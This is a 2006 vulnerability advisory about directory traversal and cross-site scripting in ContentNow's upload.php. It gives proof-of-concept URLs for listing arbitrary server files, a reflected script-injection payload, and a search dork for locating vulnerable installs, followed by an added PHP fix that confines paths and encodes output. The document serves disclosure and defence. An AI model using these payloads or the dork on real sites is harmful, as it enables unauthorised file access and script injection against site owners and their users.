ContentNow Directory Traversal(upload.php)

2006-11-14T00:00:00
ID SECURITYVULNS:DOC:15045
Type securityvulns
Reporter Securityvulns
Modified 2006-11-14T00:00:00

Description

- Vulnerability by: Timq
- http://securitydb.org
- Team Root-Shell
- Email: timq[at]hushmail.com


It appears that it is possible to view any file on a system via 'upload.php'. Proper filtering is not in effect for the 'path' and 'folder' variables. You can also upload malicious files to wherever you have access through 'upload.php'.


~PoC

http://site.com/cn/upload.php?path=/
http://site.com/cn/upload.php?folder=/
XSS: http://site.com/cn/upload.php?path="><script>alert("xss")</script>
D0rk: intitle:intitle:ContentNow


shouts: Warpboy, Zeusixsixsix, Stansar, Preddy, OG, PunkerX, Ethernet, str0ke, Gamma, Maggot, everyone else


milw0rm.com [2006-11-14]
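
A server-side fix for the two flaws described above, as an added example that is not part of the original advisory or ContentNow's code: the requested folder is canonicalized and confined to an upload root, and the request value is HTML-encoded before it is echoed. `UPLOAD_ROOT`, `resolve_inside_root()` and `h()` are hypothetical names, and the base directory is an assumed value.

```php
<?php
// Added example, not ContentNow code. UPLOAD_ROOT is an assumed location.
const UPLOAD_ROOT = '/var/www/cn/uploads';

/**
 * Resolve a user-supplied directory relative to $root. Returns the canonical
 * path, or null if it does not exist or resolves outside the root.
 */
function resolve_inside_root(string $root, string $userPath): ?string
{
    if (strpos($userPath, "\0") !== false) {
        return null;                       // reject NUL bytes outright
    }
    $rootReal = realpath($root);
    if ($rootReal === false) {
        return null;
    }
    // Always treat input as relative: "path=/" maps to the root itself,
    // never to the filesystem root.
    $joined = $rootReal . DIRECTORY_SEPARATOR . ltrim($userPath, '/\\');
    $candidate = realpath($joined);        // collapses ../ and symlinks
    if ($candidate === false || !is_dir($candidate)) {
        return null;
    }
    // The canonical result must be the root or one of its descendants.
    $prefix = $rootReal . DIRECTORY_SEPARATOR;
    if ($candidate !== $rootReal && strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

/** Encode a value for HTML text or quoted-attribute context. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$requested = $_GET['path'] ?? $_GET['folder'] ?? '';
if (!is_string($requested)) {              // e.g. path[]=x arrives as an array
    http_response_code(400);
    exit('Invalid folder');
}
$dir = resolve_inside_root(UPLOAD_ROOT, $requested);
if ($dir === null) {
    http_response_code(400);
    exit('Invalid folder');
}
// The request value is only ever written back through h().
echo '<input type="hidden" name="path" value="' . h($requested) . '">';
```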